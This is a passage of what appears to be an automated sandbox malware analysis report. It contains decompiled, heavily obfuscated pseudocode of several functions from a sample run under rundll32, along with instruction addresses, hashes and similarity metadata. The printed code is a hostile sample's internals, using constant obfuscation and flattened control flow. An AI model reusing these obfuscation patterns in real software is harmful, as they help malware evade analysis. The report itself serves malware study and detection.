				_v60 = _v60 * 0x3e;
				_v60 = _v60 ^ 0x6c73d449;
				_v76 = 0x4b89c6;
				_v76 = _v76 >> 6;
				_v76 = _v76 ^ 0x0008f57a;
				_v52 = 0x3d488e;
				_v52 = _v52 << 6;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x5226582a;
				_v44 = 0x8cf369;
				_v44 = _v44 ^ 0x25329c0c;
				_v44 = _v44 / _t215;
				_v44 = _v44 >> 0xe;
				_v44 = _v44 ^ 0x0005c7da;
				_t216 =  *0x393e10; // 0x0
				_t203 = E0037B6CF(_t216 + 0x1c, _v32, _v16, _v40);
				_t241 = _a4 + 0x2c;
				_t204 = E0037B23C(_v68, _v48, _a4 + 0x2c, _v24, _v72, _t203);
				_t248 = _t204;
				if(_t204 != 0) {
					_push(_v64);
					_push(_v8);
					_t207 = E0038DCF7(_v56, 0x371000, _t248);
					_pop(_t221);
					E003747CE( *((intOrPtr*)(_a8 + 0x18)), _v36, _t221, _v28, _v20, _t207, _t241, _v12, _v80);
					E0037A8B0(_v60, _t207, _v76);
					E00381F8A(_v52, _v44,  &_v608);
				}
				return 1;
			}


































                                                                                                                                                            0x00374eec
                                                                                                                                                            0x00374ef2
                                                                                                                                                            0x00374ef9
                                                                                                                                                            0x00374f00
                                                                                                                                                            0x00374f04
                                                                                                                                                            0x00374f08
                                                                                                                                                            0x00374f0c
                                                                                                                                                            0x00374f13
                                                                                                                                                            0x00374f1a
                                                                                                                                                            0x00374f21
                                                                                                                                                            0x00374f28
                                                                                                                                                            0x00374f2c
                                                                                                                                                            0x00374f33
                                                                                                                                                            0x00374f3a
                                                                                                                                                            0x00374f41
                                                                                                                                                            0x00374f45
                                                                                                                                                            0x00374f4c
                                                                                                                                                            0x00374f53
                                                                                                                                                            0x00374f5a
                                                                                                                                                            0x00374f67
                                                                                                                                                            0x00374f6c
                                                                                                                                                            0x00374f71
                                                                                                                                                            0x00374f78
                                                                                                                                                            0x00374f83
                                                                                                                                                            0x00374f86
                                                                                                                                                            0x00374f89
                                                                                                                                                            0x00374f90
                                                                                                                                                            0x00374f97
                                                                                                                                                            0x00374fa5
                                                                                                                                                            0x00374fa8
                                                                                                                                                            0x00374fac
                                                                                                                                                            0x00374fb3
                                                                                                                                                            0x00374fba
                                                                                                                                                            0x00374fc1
                                                                                                                                                            0x00374fc8
                                                                                                                                                            0x00374fcf
                                                                                                                                                            0x00374fd6
                                                                                                                                                            0x00374fde
                                                                                                                                                            0x00374fdf
                                                                                                                                                            0x00374fe2
                                                                                                                                                            0x00374fe9
                                                                                                                                                            0x00374ff0
                                                                                                                                                            0x00374ff7
                                                                                                                                                            0x00374ffe
                                                                                                                                                            0x00375002
                                                                                                                                                            0x00375009
                                                                                                                                                            0x00375010
                                                                                                                                                            0x00375017
                                                                                                                                                            0x0037501b
                                                                                                                                                            0x00375022
                                                                                                                                                            0x00375029
                                                                                                                                                            0x0037502d
                                                                                                                                                            0x00375039
                                                                                                                                                            0x0037503c
                                                                                                                                                            0x00375043
                                                                                                                                                            0x0037504a
                                                                                                                                                            0x00375051
                                                                                                                                                            0x00375055
                                                                                                                                                            0x0037505c
                                                                                                                                                            0x00375063
                                                                                                                                                            0x0037506a
                                                                                                                                                            0x0037506e
                                                                                                                                                            0x00375072
                                                                                                                                                            0x00375076
                                                                                                                                                            0x0037507d
                                                                                                                                                            0x00375084
                                                                                                                                                            0x0037508b
                                                                                                                                                            0x00375094
                                                                                                                                                            0x00375098
                                                                                                                                                            0x0037509f
                                                                                                                                                            0x003750a6
                                                                                                                                                            0x003750ad
                                                                                                                                                            0x003750b4
                                                                                                                                                            0x003750bb
                                                                                                                                                            0x003750c8
                                                                                                                                                            0x003750c9
                                                                                                                                                            0x003750cc
                                                                                                                                                            0x003750d3
                                                                                                                                                            0x003750da
                                                                                                                                                            0x003750de
                                                                                                                                                            0x003750e5
                                                                                                                                                            0x003750ec
                                                                                                                                                            0x003750f0
                                                                                                                                                            0x003750f4
                                                                                                                                                            0x003750fb
                                                                                                                                                            0x00375102
                                                                                                                                                            0x0037510e
                                                                                                                                                            0x00375111
                                                                                                                                                            0x00375115
                                                                                                                                                            0x00375122
                                                                                                                                                            0x0037512e
                                                                                                                                                            0x0037513a
                                                                                                                                                            0x00375147
                                                                                                                                                            0x0037514f
                                                                                                                                                            0x00375151
                                                                                                                                                            0x00375154
                                                                                                                                                            0x0037515c
                                                                                                                                                            0x00375162
                                                                                                                                                            0x0037516d
                                                                                                                                                            0x00375189
                                                                                                                                                            0x00375196
                                                                                                                                                            0x003751a8
                                                                                                                                                            0x003751b0
                                                                                                                                                            0x003751b8

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: lstrcmpi
                                                                                                                                                            • String ID: *X&R$0M*$7m_$@!x
                                                                                                                                                            • API String ID: 1586166983-4050865940
                                                                                                                                                            • Opcode ID: 3d1606d3ff977f0e4afa880c40b376133a6e036a9ec1a82e50a7996e875f190b
                                                                                                                                                            • Instruction ID: d15f5588cff653ae377c0bb494ae4f8ec98dfb4f4abd7f8f13375265b62155ea
                                                                                                                                                            • Opcode Fuzzy Hash: 3d1606d3ff977f0e4afa880c40b376133a6e036a9ec1a82e50a7996e875f190b
                                                                                                                                                            • Instruction Fuzzy Hash: B1810272C0121DABCF59DFA1D88A8EEFBB1FB44718F208118E511B6260D7B55A46CF54
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0037EA99 Relevance: 5.2, Strings: 4, Instructions: 153COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                            			E0037EA99(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t136;
				signed int _t147;
				void* _t150;
				intOrPtr* _t152;
				void* _t154;
				void* _t165;
				signed int _t166;
				signed int _t167;
				signed int* _t171;

				_push(_a16);
				_t152 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t136);
				_v52 = 0x4b44d9;
				_t171 =  &(( &_v68)[6]);
				_t165 = 0;
				_t154 = 0x40ad1f2;
				_t166 = 0x41;
				_v52 = _v52 * 0x5c;
				_v52 = _v52 ^ 0xd486af61;
				_v52 = _v52 ^ 0xcf8a129f;
				_v24 = 0x8b17cc;
				_v24 = _v24 + 0xffff02b5;
				_v24 = _v24 ^ 0x008a1a91;
				_v64 = 0xcc4e1;
				_v64 = _v64 ^ 0x71537a57;
				_v64 = _v64 | 0xbc84d226;
				_v64 = _v64 + 0x8a58;
				_v64 = _v64 ^ 0xbde0890e;
				_v12 = 0x10173e;
				_v12 = _v12 / _t166;
				_v12 = _v12 ^ 0x000bb2e7;
				_v16 = 0xcbf18d;
				_v16 = _v16 + 0x7f8c;
				_v16 = _v16 ^ 0x00cd0dea;
				_v20 = 0x7a67ce;
				_v20 = _v20 << 1;
				_v20 = _v20 ^ 0x00fa626e;
				_v68 = 0x7779f8;
				_v68 = _v68 + 0xa85e;
				_v68 = _v68 << 0x10;
				_v68 = _v68 >> 3;
				_v68 = _v68 ^ 0x0443aeb4;
				_v28 = 0xee6391;
				_v28 = _v28 ^ 0x2bfa2339;
				_v28 = _v28 ^ 0x2b1bacd2;
				_v32 = 0x87b642;
				_v32 = _v32 + 0xffff3baa;
				_v32 = _v32 ^ 0x008fda80;
				_v36 = 0x3b697f;
				_v36 = _v36 | 0x5675f49c;
				_v36 = _v36 ^ 0x5679bffa;
				_v40 = 0x254a84;
				_v40 = _v40 * 0x67;
				_v40 = _v40 ^ 0x0f0bd396;
				_v44 = 0xfc206d;
				_v44 = _v44 * 0x45;
				_v44 = _v44 ^ 0x43f6aa11;
				_v56 = 0x3dd941;
				_v56 = _v56 ^ 0x94d2d45c;
				_v56 = _v56 >> 9;
				_v56 = _v56 ^ 0x00419011;
				_v4 = 0xdcf5c3;
				_v4 = _v4 ^ 0x0d464ae6;
				_v4 = _v4 ^ 0x0d938ce3;
				_v60 = 0xe23f0;
				_v60 = _v60 ^ 0x0435e191;
				_v60 = _v60 ^ 0xbde67646;
				_v60 = _v60 ^ 0xb922f804;
				_v60 = _v60 ^ 0x00f2260b;
				_v8 = 0x523a90;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x259e6962;
				_v48 = 0x46565e;
				_t167 = 3;
				_v48 = _v48 * 0x6a;
				_t168 = _v4;
				_v48 = _v48 / _t167;
				_v48 = _v48 ^ 0x09b4f31e;
				do {
					while(_t154 != 0x40ad1f2) {
						if(_t154 == 0x458d12f) {
							_t147 = E00378F65(_v12, _v16, _a12, _v20, _v24, _t154, _v64, _v68, _v52, _v28, _t154, 0);
							_t168 = _t147;
							_t171 =  &(_t171[0xa]);
							if(_t147 != 0xffffffff) {
								_t154 = 0x4af2a99;
								continue;
							}
						} else {
							if(_t154 == 0x4af2a99) {
								_t150 = E003719B8(_t154, _v36,  *((intOrPtr*)(_t152 + 4)), _v40, _t168, _v44, _v56, _t152 + 4,  *_t152);
								_t171 =  &(_t171[8]);
								_t165 = _t150;
								_t154 = 0xe5b5021;
								continue;
							} else {
								if(_t154 != 0xe5b5021) {
									goto L11;
								} else {
									E00381E67(_v4, _v60, _v8, _v48, _t168);
								}
							}
						}
						L6:
						return _t165;
					}
					_t154 = 0x458d12f;
					L11:
				} while (_t154 != 0xd2f352d);
				goto L6;
			}





























                                                                                                                                                            0x0037eaa0
                                                                                                                                                            0x0037eaa4
                                                                                                                                                            0x0037eaa6
                                                                                                                                                            0x0037eaaa
                                                                                                                                                            0x0037eaae
                                                                                                                                                            0x0037eab2
                                                                                                                                                            0x0037eab3
                                                                                                                                                            0x0037eab4
                                                                                                                                                            0x0037eab9
                                                                                                                                                            0x0037eac1
                                                                                                                                                            0x0037eacb
                                                                                                                                                            0x0037eacd
                                                                                                                                                            0x0037ead4
                                                                                                                                                            0x0037ead5
                                                                                                                                                            0x0037ead9
                                                                                                                                                            0x0037eae1
                                                                                                                                                            0x0037eae9
                                                                                                                                                            0x0037eaf1
                                                                                                                                                            0x0037eaf9
                                                                                                                                                            0x0037eb01
                                                                                                                                                            0x0037eb09
                                                                                                                                                            0x0037eb11
                                                                                                                                                            0x0037eb19
                                                                                                                                                            0x0037eb21
                                                                                                                                                            0x0037eb29
                                                                                                                                                            0x0037eb37
                                                                                                                                                            0x0037eb3b
                                                                                                                                                            0x0037eb43
                                                                                                                                                            0x0037eb4b
                                                                                                                                                            0x0037eb53
                                                                                                                                                            0x0037eb5b
                                                                                                                                                            0x0037eb63
                                                                                                                                                            0x0037eb67
                                                                                                                                                            0x0037eb6f
                                                                                                                                                            0x0037eb77
                                                                                                                                                            0x0037eb7f
                                                                                                                                                            0x0037eb84
                                                                                                                                                            0x0037eb89
                                                                                                                                                            0x0037eb91
                                                                                                                                                            0x0037eb99
                                                                                                                                                            0x0037eba1
                                                                                                                                                            0x0037eba9
                                                                                                                                                            0x0037ebb1
                                                                                                                                                            0x0037ebb9
                                                                                                                                                            0x0037ebc1
                                                                                                                                                            0x0037ebc9
                                                                                                                                                            0x0037ebd1
                                                                                                                                                            0x0037ebd9
                                                                                                                                                            0x0037ebe6
                                                                                                                                                            0x0037ebea
                                                                                                                                                            0x0037ebf2
                                                                                                                                                            0x0037ebff
                                                                                                                                                            0x0037ec03
                                                                                                                                                            0x0037ec0b
                                                                                                                                                            0x0037ec13
                                                                                                                                                            0x0037ec1b
                                                                                                                                                            0x0037ec20
                                                                                                                                                            0x0037ec28
                                                                                                                                                            0x0037ec30
                                                                                                                                                            0x0037ec38
                                                                                                                                                            0x0037ec40
                                                                                                                                                            0x0037ec48
                                                                                                                                                            0x0037ec50
                                                                                                                                                            0x0037ec58
                                                                                                                                                            0x0037ec60
                                                                                                                                                            0x0037ec68
                                                                                                                                                            0x0037ec75
                                                                                                                                                            0x0037ec79
                                                                                                                                                            0x0037ec81
                                                                                                                                                            0x0037ec92
                                                                                                                                                            0x0037ec98
                                                                                                                                                            0x0037eca2
                                                                                                                                                            0x0037eca6
                                                                                                                                                            0x0037ecaa
                                                                                                                                                            0x0037ecb2
                                                                                                                                                            0x0037ecb2
                                                                                                                                                            0x0037ecc0
                                                                                                                                                            0x0037ed52
                                                                                                                                                            0x0037ed57
                                                                                                                                                            0x0037ed59
                                                                                                                                                            0x0037ed5f
                                                                                                                                                            0x0037ed61
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ed61
                                                                                                                                                            0x0037ecc2
                                                                                                                                                            0x0037ecc8
                                                                                                                                                            0x0037ed16
                                                                                                                                                            0x0037ed1b
                                                                                                                                                            0x0037ed1e
                                                                                                                                                            0x0037ed20
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ecca
                                                                                                                                                            0x0037ecd0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ecd6
                                                                                                                                                            0x0037ece7
                                                                                                                                                            0x0037ecec
                                                                                                                                                            0x0037ecd0
                                                                                                                                                            0x0037ecc8
                                                                                                                                                            0x0037ecef
                                                                                                                                                            0x0037ecf8
                                                                                                                                                            0x0037ecf8
                                                                                                                                                            0x0037ed6b
                                                                                                                                                            0x0037ed6d
                                                                                                                                                            0x0037ed6d
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: -5/$WzSq$^VF$JF
                                                                                                                                                            • API String ID: 0-2399144359
                                                                                                                                                            • Opcode ID: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                                                            • Instruction ID: bfadb7d2174a0241a095134e479ea31a791fbf3bee7c7bf14baef03f82ca2dc5
                                                                                                                                                            • Opcode Fuzzy Hash: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                                                            • Instruction Fuzzy Hash: 487122710083419BC769DF65C98681BBBE2FBC8758F508A1DF29A96220C3B5DA588F43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00389BCF Relevance: 5.1, Strings: 4, Instructions: 133COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E00389BCF() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				unsigned int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t111;
				signed int _t115;
				signed int _t117;
				void* _t118;
				signed int _t132;
				void* _t134;
				signed int _t135;
				signed int* _t136;

				_t136 =  &_v568;
				_v560 = 0x297e3c;
				_v560 = _v560 >> 9;
				_t118 = 0x4ead2fe;
				_v560 = _v560 + 0xe8be;
				_v560 = _v560 ^ 0xc9c09221;
				_v560 = _v560 ^ 0xc9c20db8;
				_v540 = 0x190e1d;
				_v540 = _v540 >> 7;
				_v540 = _v540 >> 0xd;
				_v540 = _v540 ^ 0x000cdd3b;
				_v544 = 0x86c2f0;
				_v544 = _v544 | 0x0d7eac20;
				_v544 = _v544 ^ 0xe6b61282;
				_v544 = _v544 ^ 0xeb41e563;
				_v552 = 0x262f60;
				_v552 = _v552 ^ 0x76c91adc;
				_v552 = _v552 + 0xd1c5;
				_v552 = _v552 ^ 0x76fc323e;
				_v524 = 0xf427e0;
				_v524 = _v524 + 0xffff22a3;
				_v524 = _v524 ^ 0x00f85f52;
				_v548 = 0xdbc1a5;
				_v548 = _v548 >> 0xb;
				_v548 = _v548 + 0xf615;
				_v548 = _v548 ^ 0x0006ff3e;
				_v556 = 0xd2f840;
				_v556 = _v556 * 0x5f;
				_t134 = 0;
				_v556 = _v556 ^ 0x4e4cccaa;
				_v568 = 0x74ecfa;
				_t132 = 0x53;
				_t133 = _v556;
				_v568 = _v568 / _t132;
				_v568 = _v568 ^ 0xc72664ff;
				_v568 = _v568 << 0xf;
				_v568 = _v568 ^ 0x862d9f40;
				_v536 = 0xc0d44a;
				_v536 = _v536 + 0x396d;
				_t135 = _v556;
				_t117 = _v556;
				_v536 = _v536 * 0x46;
				_v536 = _v536 ^ 0x34c6c601;
				_v532 = 0xf37e83;
				_v532 = _v532 << 8;
				_v532 = _v532 | 0x760e0a19;
				_v532 = _v532 ^ 0xf77c332a;
				_v528 = 0x91f8e3;
				_v528 = _v528 ^ 0xc904aca2;
				_v528 = _v528 ^ 0xc9900919;
				do {
					while(_t118 != 0x27fe330) {
						if(_t118 == 0x4ead2fe) {
							_t118 = 0x96d401d;
							continue;
						} else {
							if(_t118 == 0x7ac597b) {
								_t117 = E0037B6CF( &_v520, _v548, _v556, _v568);
								_t118 = 0xa7595e6;
								continue;
							} else {
								if(_t118 == 0x80b0e4e) {
									_t90 =  &_v552; // 0xeb41e563
									_t111 = E00379B83(_t133, __eflags, _v544,  *_t90,  &_v520, _v524);
									_t136 =  &(_t136[4]);
									__eflags = _t111;
									if(__eflags != 0) {
										_t118 = 0x7ac597b;
										continue;
									}
								} else {
									if(_t118 == 0x96d401d) {
										_t115 = E003752C2();
										_t133 = _t115;
										__eflags = _t115;
										if(__eflags != 0) {
											_t118 = 0x80b0e4e;
											continue;
										}
									} else {
										if(_t118 != 0xa7595e6) {
											goto L15;
										} else {
											_t135 = E00372051(_v532, _t117, _v528);
											_t118 = 0x27fe330;
											continue;
										}
									}
								}
							}
						}
						goto L16;
					}
					_v564 = 0x69bdc3;
					_v564 = _v564 | 0xfd1bce6c;
					_v564 = _v564 ^ 0xf153ffb6;
					_v564 = _v564 ^ 0x260f00bb;
					__eflags = _t135 - _v564;
					_t134 =  ==  ? 1 : _t134;
					_t118 = 0x8b668cc;
					L15:
					__eflags = _t118 - 0x8b668cc;
				} while (__eflags != 0);
				L16:
				return _t134;
			}
























                                                                                                                                                            0x00389bcf
                                                                                                                                                            0x00389bd9
                                                                                                                                                            0x00389be3
                                                                                                                                                            0x00389be8
                                                                                                                                                            0x00389bed
                                                                                                                                                            0x00389bf5
                                                                                                                                                            0x00389bfd
                                                                                                                                                            0x00389c05
                                                                                                                                                            0x00389c0d
                                                                                                                                                            0x00389c12
                                                                                                                                                            0x00389c17
                                                                                                                                                            0x00389c1f
                                                                                                                                                            0x00389c27
                                                                                                                                                            0x00389c2f
                                                                                                                                                            0x00389c37
                                                                                                                                                            0x00389c3f
                                                                                                                                                            0x00389c47
                                                                                                                                                            0x00389c4f
                                                                                                                                                            0x00389c57
                                                                                                                                                            0x00389c5f
                                                                                                                                                            0x00389c67
                                                                                                                                                            0x00389c6f
                                                                                                                                                            0x00389c77
                                                                                                                                                            0x00389c7f
                                                                                                                                                            0x00389c84
                                                                                                                                                            0x00389c8c
                                                                                                                                                            0x00389c94
                                                                                                                                                            0x00389ca1
                                                                                                                                                            0x00389ca5
                                                                                                                                                            0x00389ca7
                                                                                                                                                            0x00389caf
                                                                                                                                                            0x00389cbd
                                                                                                                                                            0x00389cc0
                                                                                                                                                            0x00389cc4
                                                                                                                                                            0x00389cc8
                                                                                                                                                            0x00389cd0
                                                                                                                                                            0x00389cd5
                                                                                                                                                            0x00389cdd
                                                                                                                                                            0x00389ce5
                                                                                                                                                            0x00389cf2
                                                                                                                                                            0x00389cf6
                                                                                                                                                            0x00389cfa
                                                                                                                                                            0x00389cfe
                                                                                                                                                            0x00389d06
                                                                                                                                                            0x00389d0e
                                                                                                                                                            0x00389d13
                                                                                                                                                            0x00389d1b
                                                                                                                                                            0x00389d23
                                                                                                                                                            0x00389d2b
                                                                                                                                                            0x00389d33
                                                                                                                                                            0x00389d3b
                                                                                                                                                            0x00389d3b
                                                                                                                                                            0x00389d4d
                                                                                                                                                            0x00389e02
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00389d53
                                                                                                                                                            0x00389d59
                                                                                                                                                            0x00389df6
                                                                                                                                                            0x00389df8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00389d5f
                                                                                                                                                            0x00389d65
                                                                                                                                                            0x00389dc1
                                                                                                                                                            0x00389dc9
                                                                                                                                                            0x00389dce
                                                                                                                                                            0x00389dd1
                                                                                                                                                            0x00389dd3
                                                                                                                                                            0x00389dd5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00389dd5
                                                                                                                                                            0x00389d67
                                                                                                                                                            0x00389d6d
                                                                                                                                                            0x00389da0
                                                                                                                                                            0x00389da5
                                                                                                                                                            0x00389da7
                                                                                                                                                            0x00389da9
                                                                                                                                                            0x00389daf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00389daf
                                                                                                                                                            0x00389d6f
                                                                                                                                                            0x00389d75
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00389d7b
                                                                                                                                                            0x00389d8f
                                                                                                                                                            0x00389d91
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00389d91
                                                                                                                                                            0x00389d75
                                                                                                                                                            0x00389d6d
                                                                                                                                                            0x00389d65
                                                                                                                                                            0x00389d59
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00389d4d
                                                                                                                                                            0x00389e0c
                                                                                                                                                            0x00389e16
                                                                                                                                                            0x00389e1f
                                                                                                                                                            0x00389e27
                                                                                                                                                            0x00389e33
                                                                                                                                                            0x00389e35
                                                                                                                                                            0x00389e38
                                                                                                                                                            0x00389e3d
                                                                                                                                                            0x00389e3d
                                                                                                                                                            0x00389e3d
                                                                                                                                                            0x00389e4a
                                                                                                                                                            0x00389e55

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: <~)$`/&$cA$m9
                                                                                                                                                            • API String ID: 0-2671356241
                                                                                                                                                            • Opcode ID: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                                                            • Instruction ID: 7c47a60a2af08b902b2851dce1eca2a9fb35aea2a77d77fb77c6a1054ef9fa51
                                                                                                                                                            • Opcode Fuzzy Hash: 0357c323211fbb2750b6ff63dd811012db8b592bb5a4c14c508bc9731e28ab86
                                                                                                                                                            • Instruction Fuzzy Hash: 725183710083019FC398CE21C09942BBBE1FFD8758F541E1EF9A6A6260D3B4CA098F86
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00379B83 Relevance: 5.1, Strings: 4, Instructions: 109COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                            			E00379B83(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* _v64;
				intOrPtr _v68;
				void* _t115;
				signed int _t130;
				signed int _t131;
				void* _t133;

				_push(_a16);
				_push(_a12);
				_v52 = 0x104;
				_push(_a8);
				_push(_a4);
				_push(0x104);
				_push(__ecx);
				E003820B9(0x104);
				_v68 = 0x342964;
				asm("stosd");
				_t133 = 0;
				asm("stosd");
				asm("stosd");
				_v40 = 0xa3a3c;
				_v40 = _v40 + 0x2c25;
				_v40 = _v40 ^ 0x000a7661;
				_v16 = 0x75ee44;
				_t130 = 0x7a;
				_v16 = _v16 / _t130;
				_v16 = _v16 ^ 0xc9e42672;
				_v16 = _v16 ^ 0xc9e58a7e;
				_v8 = 0x386b92;
				_v8 = _v8 << 4;
				_v8 = _v8 | 0x0ec9a536;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x000b4478;
				_v44 = 0xd66787;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x001d593f;
				_v24 = 0x7c5a73;
				_v24 = _v24 | 0xae316990;
				_t131 = 0x19;
				_v24 = _v24 / _t131;
				_v24 = _v24 ^ 0x06f0967a;
				_v20 = 0x3dfd52;
				_v20 = _v20 >> 8;
				_v20 = _v20 * 0x24;
				_v20 = _v20 ^ 0x0009affd;
				_v12 = 0xf0c6a5;
				_v12 = _v12 + 0xffff2be4;
				_v12 = _v12 + 0x1686;
				_v12 = _v12 << 2;
				_v12 = _v12 ^ 0x03c3840c;
				_v48 = 0x30c967;
				_v48 = _v48 | 0xcae095b2;
				_v48 = _v48 ^ 0xcaf7f966;
				_v36 = 0xabcbdc;
				_v36 = _v36 + 0xfffff856;
				_v36 = _v36 | 0xb2b71321;
				_v36 = _v36 ^ 0xb2b3c312;
				_v32 = 0xda8dbe;
				_v32 = _v32 + 0xffff364b;
				_v32 = _v32 | 0x02598b37;
				_v32 = _v32 ^ 0x02d31c0a;
				_v28 = 0x528ee8;
				_v28 = _v28 * 0x12;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x17383776;
				_t115 = E003791DD(__ecx, _v40, __ecx);
				_t132 = _t115;
				if(_t115 != 0) {
					_t133 = E003776AA(_a12,  &_v52, _v44, _v24, __ecx, _v20, _t132, _v12);
					E00381E67(_v48, _v36, _v32, _v28, _t132);
				}
				return _t133;
			}





















                                                                                                                                                            0x00379b8b
                                                                                                                                                            0x00379b93
                                                                                                                                                            0x00379b96
                                                                                                                                                            0x00379b99
                                                                                                                                                            0x00379b9c
                                                                                                                                                            0x00379b9f
                                                                                                                                                            0x00379ba0
                                                                                                                                                            0x00379ba1
                                                                                                                                                            0x00379ba6
                                                                                                                                                            0x00379bb4
                                                                                                                                                            0x00379bb5
                                                                                                                                                            0x00379bb9
                                                                                                                                                            0x00379bba
                                                                                                                                                            0x00379bbb
                                                                                                                                                            0x00379bc2
                                                                                                                                                            0x00379bc9
                                                                                                                                                            0x00379bd0
                                                                                                                                                            0x00379bda
                                                                                                                                                            0x00379bdf
                                                                                                                                                            0x00379be4
                                                                                                                                                            0x00379beb
                                                                                                                                                            0x00379bf2
                                                                                                                                                            0x00379bf9
                                                                                                                                                            0x00379bfd
                                                                                                                                                            0x00379c04
                                                                                                                                                            0x00379c08
                                                                                                                                                            0x00379c0f
                                                                                                                                                            0x00379c16
                                                                                                                                                            0x00379c1a
                                                                                                                                                            0x00379c21
                                                                                                                                                            0x00379c28
                                                                                                                                                            0x00379c32
                                                                                                                                                            0x00379c38
                                                                                                                                                            0x00379c3b
                                                                                                                                                            0x00379c42
                                                                                                                                                            0x00379c49
                                                                                                                                                            0x00379c52
                                                                                                                                                            0x00379c55
                                                                                                                                                            0x00379c5c
                                                                                                                                                            0x00379c63
                                                                                                                                                            0x00379c6a
                                                                                                                                                            0x00379c71
                                                                                                                                                            0x00379c75
                                                                                                                                                            0x00379c7c
                                                                                                                                                            0x00379c83
                                                                                                                                                            0x00379c8a
                                                                                                                                                            0x00379c91
                                                                                                                                                            0x00379c98
                                                                                                                                                            0x00379c9f
                                                                                                                                                            0x00379ca6
                                                                                                                                                            0x00379cad
                                                                                                                                                            0x00379cb4
                                                                                                                                                            0x00379cbb
                                                                                                                                                            0x00379cc2
                                                                                                                                                            0x00379cc9
                                                                                                                                                            0x00379cd4
                                                                                                                                                            0x00379cd7
                                                                                                                                                            0x00379cdb
                                                                                                                                                            0x00379ceb
                                                                                                                                                            0x00379cf3
                                                                                                                                                            0x00379cf7
                                                                                                                                                            0x00379d16
                                                                                                                                                            0x00379d21
                                                                                                                                                            0x00379d26
                                                                                                                                                            0x00379d30

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
